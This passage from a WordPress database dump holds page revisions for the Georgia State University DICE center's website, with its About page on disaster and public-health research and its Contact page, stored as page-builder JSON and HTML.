Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-18 20:38:07','2022-03-19 00:38:07','',353,'https://gsudice.dataconn.net/?p=578',0,'revision','',0),(579,1,'2022-03-18 20:38:07','2022-03-19 00:38:07','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n            <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c18\" class=\"h-global-transition-all h-heading style-324 style-local-122-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c18\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Our Mission</h3>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n            <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-18 20:38:07','2022-03-19 00:38:07','',122,'https://gsudice.dataconn.net/?p=579',0,'revision','',0),(586,1,'2022-03-18 20:45:31','2022-03-19 00:45:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":399,\"type\":\"content\",\"props\":{\"content\":\"DICE\"}},{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c8\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:45:31','2022-03-19 00:45:31','',546,'https://gsudice.dataconn.net/?p=586',0,'revision','',0),(587,1,'2022-03-18 20:45:31','2022-03-19 00:45:31','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-399 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">DICE</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c6\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c8-outer\">\n            <div data-colibri-id=\"185-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:45:31','2022-03-19 00:45:31','',185,'https://gsudice.dataconn.net/?p=587',0,'revision','',0),(593,1,'2022-03-18 20:50:02','2022-03-19 00:50:02','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-2-webp','','','2022-03-18 20:50:02','2022-03-19 00:50:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp',0,'attachment','image/webp',0),(594,1,'2022-03-18 20:50:37','2022-03-19 00:50:37','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp','','inherit','open','closed','','cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-2-webp','','','2022-03-18 20:50:37','2022-03-19 00:50:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp',0,'attachment','image/webp',0),(595,1,'2022-03-18 20:50:42','2022-03-19 00:50:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c8\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:50:42','2022-03-19 00:50:42','',546,'https://gsudice.dataconn.net/?p=595',0,'revision','',0),(596,1,'2022-03-18 20:50:42','2022-03-19 00:50:42','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c6\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c8-outer\">\n            <div data-colibri-id=\"185-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:50:42','2022-03-19 00:50:42','',185,'https://gsudice.dataconn.net/?p=596',0,'revision','',0),(602,1,'2022-03-18 20:52:17','2022-03-19 00:52:17','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:52:17','2022-03-19 00:52:17','',546,'https://gsudice.dataconn.net/?p=602',0,'revision','',0),(603,1,'2022-03-18 20:52:17','2022-03-19 00:52:17','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start 